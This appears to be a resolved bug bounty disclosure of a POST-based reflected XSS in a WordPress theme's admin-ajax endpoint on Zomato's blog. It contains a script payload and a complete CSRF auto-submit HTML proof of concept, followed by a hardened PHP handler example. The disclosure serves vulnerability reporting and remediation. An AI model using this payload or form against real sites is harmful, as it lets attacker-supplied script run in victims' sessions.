[Zomato's Blog] POST based XSS on https://www.zomato.com/blog/wp-admin/admin-ajax.php?td_theme_name=Newspaper&v=8.2
Severity: Low
Vulnerability Details
## Issue details:
POST-based XSS
## Vulnerable URL:
https://www.zomato.com/blog/wp-admin/admin-ajax.php?td_theme_name=Newspaper&v=8.2
## Vulnerable Parameter:
`loopState[moduleId]`
## Payload:
`<svg><script>prompt(document.domain)</script>`
## Steps to reproduce:
* As this is POST-based, you need to create an HTML CSRF page to trigger the XSS.
* The HTML code is below:

```html
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://www.zomato.com/blog/wp-admin/admin-ajax.php?td_theme_name=Newspaper&v=8.2" method="POST">
<input type="hidden" name="action" value="td_ajax_loop" />
<input type="hidden" name="loopState[sidebarPosition]" value="" />
<input type="hidden" name="loopState[moduleId]" value="<svg><script>prompt&#40;document.domain)</script>" />
<input type="hidden" name="loopState[currentPage]" value="2" />
<input type="hidden" name="loopState[max_num_pages]" value="4" />
<input type="hidden" name="loopState[atts][category_id]" value="479" />
<input type="hidden" name="loopState[atts][offset]" value="2" />
<input type="hidden" name="loopState[ajax_pagination_infinite_stop]" value="3" />
<input type="hidden" name="loopState[server_reply_html_data]" value="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
```

* Save this as a .html file.
* Open that HTML file; it will trigger the XSS.
## POC:
Screenshot and necessary files are enclosed in the attachment.
## Impact
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request that, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
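The root cause here is a WordPress AJAX handler reflecting a POST parameter into its response without validation or output encoding. The following is an added example of how such a handler can be hardened; it is not the Newspaper theme's actual code. The action name `td_ajax_loop` and the `loopState` keys come from this report, while the handler body, the nonce action name `td_ajax_loop_nonce` and the response format are assumptions.

```php
<?php
// Added example (hypothetical, not the Newspaper theme's own handler).
// Registers a hardened handler for the td_ajax_loop action from the report.
add_action('wp_ajax_td_ajax_loop', 'hardened_td_ajax_loop');
add_action('wp_ajax_nopriv_td_ajax_loop', 'hardened_td_ajax_loop');

function hardened_td_ajax_loop() {
    // A nonce binds the request to a page the site itself served, so a
    // cross-origin auto-submitted form like the PoC above is rejected
    // before any parameter is touched (nonce action name is assumed).
    check_ajax_referer('td_ajax_loop_nonce', 'nonce');

    $state = (isset($_POST['loopState']) && is_array($_POST['loopState']))
        ? wp_unslash($_POST['loopState'])
        : array();

    // moduleId is an internal template identifier, so allowlist its shape
    // instead of trying to strip tags out of arbitrary input.
    $module_id = isset($state['moduleId']) ? (string) $state['moduleId'] : '';
    if (!preg_match('/^[A-Za-z0-9_]{1,64}$/', $module_id)) {
        wp_send_json_error(array('message' => 'invalid moduleId'), 400);
    }

    // Numeric paging state is coerced to non-negative integers.
    $current_page = isset($state['currentPage'])   ? absint($state['currentPage'])   : 1;
    $max_pages    = isset($state['max_num_pages']) ? absint($state['max_num_pages']) : 1;

    // Anything reflected into markup is escaped for the attribute context.
    $html = sprintf(
        '<div class="td-loop" data-module="%s" data-page="%d" data-max="%d"></div>',
        esc_attr($module_id),
        $current_page,
        $max_pages
    );

    // wp_send_json_success sends Content-Type: application/json, so the
    // reflected value is never rendered as a document even if the endpoint
    // is opened directly in a browser.
    wp_send_json_success(array('html' => $html));
}
```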
Report Stats
- Report ID: 335481
- State: Closed
- Substate: resolved
- Upvotes: 11